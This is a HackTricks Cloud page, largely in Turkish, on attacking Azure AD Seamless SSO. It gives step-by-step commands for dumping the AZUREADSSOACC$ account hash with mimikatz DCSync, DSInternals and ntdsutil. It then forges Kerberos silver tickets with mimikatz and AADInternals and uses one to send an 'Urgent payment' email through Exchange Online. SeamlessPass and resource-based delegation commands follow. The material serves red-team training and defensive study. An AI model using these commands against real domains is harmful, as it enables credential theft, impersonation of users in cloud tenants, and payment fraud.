Az - Seamless SSO

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Temel Bilgiler

Belgelerden: Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO), kullanıcıları kurumsal ağınıza bağlı kurumsal cihazlarında otomatik olarak oturum açtırır. Etkinleştirildiğinde, kullanıcıların Azure AD'ye oturum açmak için şifrelerini girmeleri gerekmez ve genellikle kullanıcı adlarını bile girmeleri gerekmez. Bu özellik, kullanıcılarınıza ek bir yerel bileşen gerektirmeden bulut tabanlı uygulamalarınıza kolay erişim sağlar.

Temelde Azure AD Seamless SSO, kullanıcıları yerel bir alan bağlı PC'de olduklarında oturum açtırır.

Bu, hem PHS (Şifre Hash Senkronizasyonu) hem de PTA (Geçiş Kimlik Doğrulama) tarafından desteklenmektedir.

Masaüstü SSO, kimlik doğrulama için Kerberos kullanmaktadır. Yapılandırıldığında, Azure AD Connect, yerel AD'de AZUREADSSOACC$ adında bir bilgisayar hesabı oluşturur. AZUREADSSOACC$ hesabının şifresi, yapılandırma sırasında düz metin olarak Azure AD'ye gönderilir.

Kerberos biletleri, şifrenin NTHash (MD4) kullanılarak şifrelenir ve Azure AD, gönderilen şifreyi biletleri şifre çözmek için kullanır.

Azure AD, Kerberos biletlerini kabul eden bir uç nokta (https://autologon.microsoftazuread-sso.com) sunar. Alan bağlı makinenin tarayıcısı, SSO için bu uç noktaya biletleri iletir.

Yerel -> bulut

Kullanıcının AZUREADSSOACC$ şifresi asla değişmez. Bu nedenle, bir alan yöneticisi bu hesabın hash'ini ele geçirebilir ve ardından herhangi bir yerel kullanıcı senkronize edilmiş Azure'a bağlanmak için gümüş biletler oluşturmak için kullanabilir:

# Dump hash using mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:domain.local /dc:dc.domain.local"'
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit

# Dump hash using https://github.com/MichaelGrafnetter/DSInternals
Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' -Domain contoso -Server lon-dc1.contoso.local

# Dump using ntdsutil and DSInternals
## Dump NTDS.dit
ntdsutil "ac i ntds" "ifm” "create full C:\temp" q q
## Extract password
Install-Module DSInternals
Import-Module DSInternals
$key = Get-BootKey -SystemHivePath 'C:\temp\registry\SYSTEM'
(Get-ADDBAccount -SamAccountName 'AZUREADSSOACC$' -DBPath 'C:\temp\Active Directory\ntds.dit' -BootKey $key).NTHash | Format-Hexos

Hash ile artık gümüş biletler oluşturabilirsiniz:

# Get users and SIDs
Get-AzureADUser | Select UserPrincipalName,OnPremisesSecurityIdentifier

# Create a silver ticket to connect to Azure with mimikatz
Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin /sid:S-1-5-21-123456789-1234567890-123456789 /id:1105 /domain:domain.local /rc4:<azureadssoacc hash> /target:aadg.windows.net.nsatc.net /service:HTTP /ptt"'
mimikatz.exe "kerberos::golden /user:elrond /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 /domain:contoso.local /rc4:12349e088b2c13d93833d0ce947676dd /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit

# Create silver ticket with AADInternal to access Exchange Online
$kerberos=New-AADIntKerberosTicket -SidString "S-1-5-21-854168551-3279074086-2022502410-1104" -Hash "097AB3CBED7B9DD6FE6C992024BC38F4"
$at=Get-AADIntAccessTokenForEXO -KerberosTicket $kerberos -Domain company.com
## Send email
Send-AADIntOutlookMessage -AccessToken $at -Recipient "someone@company.com" -Subject "Urgent payment" -Message "<h1>Urgent!</h1><br>The following bill should be paid asap."

To utilize the silver ticket, the following steps should be executed:

Tarayıcıyı Başlatın: Mozilla Firefox başlatılmalıdır.
Tarayıcıyı Yapılandırın:

about:config sayfasına gidin.
network.negotiate-auth.trusted-uris için tercihi belirtilen değerlere ayarlayın:
https://aadg.windows.net.nsatc.net
https://autologon.microsoftazuread-sso.com

Web Uygulamasına Erişim:

Kuruluşun AAD alanı ile entegre bir web uygulamasını ziyaret edin. Yaygın bir örnek Office 365dir.

Kimlik Doğrulama Süreci:

Giriş ekranında, kullanıcı adı girilmeli ve şifre alanı boş bırakılmalıdır.
Devam etmek için TAB veya ENTER tuşuna basın.

Bu, MFA etkinse atlatmaz

Dcsync olmadan Seçenek 2 - SeamlessPass

Bu saldırıyı dcsync saldırısı olmadan daha gizli bir şekilde gerçekleştirmek de mümkündür, bu blog yazısında açıklandığı gibi. Bunun için yalnızca aşağıdakilerden birine ihtiyacınız var:

Bir tehlikeye atılmış kullanıcının TGT'si: Eğer bir tane yoksa ama kullanıcı tehlikeye atıldıysa, birçok araçta uygulanan sahte TGT delegasyonu hilesi kullanılarak bir tane elde edilebilir, örneğin Kekeo ve Rubeus.
Golden Ticket: Eğer KRBTGT anahtarına sahipseniz, saldırıya uğrayan kullanıcı için gerekli TGT'yi oluşturabilirsiniz.
Bir tehlikeye atılmış kullanıcının NTLM hash'i veya AES anahtarı: SeamlessPass, bu bilgi ile etki alanı denetleyicisi ile iletişim kurarak TGT'yi oluşturacaktır.
AZUREADSSOACC$ hesabı NTLM hash'i veya AES anahtarı: Bu bilgi ve saldırı yapılacak kullanıcının Güvenlik Tanımlayıcısı (SID) ile bir hizmet bileti oluşturmak ve bulut ile kimlik doğrulamak mümkündür (önceki yöntemde olduğu gibi).

Son olarak, TGT ile SeamlessPass aracını kullanmak mümkündür:

seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt <base64_TGT>

Seamless SSO ile Firefox'u çalıştırmak için daha fazla bilgi bu blog yazısında bulunabilir.

Bulut yalnızca kullanıcılar için Kerberos biletleri oluşturma

Eğer Active Directory yöneticileri Azure AD Connect'e erişime sahipse, herhangi bir bulut kullanıcısı için SID ayarlayabilirler. Bu şekilde Kerberos biletleri bulut yalnızca kullanıcılar için de oluşturulabilir. Tek gereklilik, SID'nin uygun bir SID olmasıdır.

Bulut yalnızca yönetici kullanıcıların SID'sini değiştirmek artık Microsoft tarafından engellenmiştir. Bilgi için https://aadinternals.com/post/on-prem_admin/ kontrol edin.

On-prem -> Bulut üzerinden Kaynak Tabanlı Kısıtlı Delegasyon

Bu hesabın bulunduğu konteyner veya OU'daki bilgisayar hesaplarını (AZUREADSSOACC$) yönetebilen herkes, hesap üzerinde kaynak tabanlı kısıtlı delegasyonu yapılandırabilir ve ona erişebilir.

python rbdel.py -u <workgroup>\\<user> -p <pass> <ip> azureadssosvc$

Referanslar

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousAz - PTA - Pass-through Authentication NextAz - Arc vulnerable GPO Deploy Script

Last updated 3 days ago